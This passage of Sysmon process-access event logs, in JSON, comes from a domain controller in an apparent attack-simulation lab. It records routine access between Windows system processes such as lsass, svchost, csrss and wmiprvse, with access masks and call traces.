C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.919","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2862,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2863,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2864,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2865,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.919\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.919","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2866,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2867,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.935\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 5024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.935","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"5024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2868,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.935\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.935","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2869,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.935\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dl